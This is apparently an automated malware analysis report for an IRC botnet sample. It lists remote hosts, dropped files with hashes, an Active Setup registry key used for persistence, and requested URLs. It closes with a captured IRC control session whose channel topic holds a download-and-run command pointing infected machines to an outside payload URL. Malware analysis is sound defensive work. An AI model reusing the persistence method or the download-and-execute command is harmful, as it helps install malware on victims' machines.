Remote Host Port Number
193.242.108.49 80
66.45.237.212 80
64.120.11.167 5900
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash
1 %UserProfile%update.exe 57 387 bytes MD5: 0xD037B4F37AF523C6F7CFB0BA122296A2
SHA-1: 0x23CD0E21CF3C0693E2F4ECA7A2DB3B04E43D351E
2 c:GardiTuxatbov.exe
[file and pathname of the sample #1] 69 632 bytes MD5: 0x99CA8EFB12FB35FA09D10C595EB37DC8
SHA-1: 0xA97BE1EBB176D74C6191D17774E1888330CE86FD
3 c:GardiTuxatDesKTop.ini 62 bytes MD5: 0x7457A5DF1FF47C957ACF1FA000D7D9AD
SHA-1: 0x69D2BBA827FD4DE0169419A0FDA280252B348514
* Note:
o %UserProfile% is a variable that specifies the current user’s profile folder. By default, this is C:Documents and Settings[UserName] (Windows NT/2000/XP).
* The following directories were created:
o c:Gardi
o c:GardiTuxat
Registry Modifications
* The following Registry Key was created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-KKX2-4887QWE23218}
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-KKX2-4887QWE23218}]
+ StubPath = “c:GardiTuxatbov.exe”
so that bov.exe runs every time Windows starts
* The data identified by the following URLs was then requested from the remote web server:
o http://193.242.108.49/Dialer_Min/number.asp
o http://yeahbr0.t35.com/resources/bottom.mos
NICK VirUs-dqgtyntw
USER VirUs “” “tjb” :
8Coded
8VirUs..
JOIN #7# Virus
PRIVMSG #7# :Success.
PASS Virus
Invisible Users: 16805
Channels: 9 channels formed
Clients: I have 16806 clients and 0 servers
Local users: Current Local Users: 16806 Max: 23080
Global users: Current Global Users: 16806 Max: 23080
Now talking in #7#
Topic On: [#7# ] [ !NAZELlol http://yeahbr0.t35.com/resources/bottom.mos update.exe 1 ]
Topic By: [ OgarDtheLegenD ]
Modes On: [ #7# ] [ +smntMu ]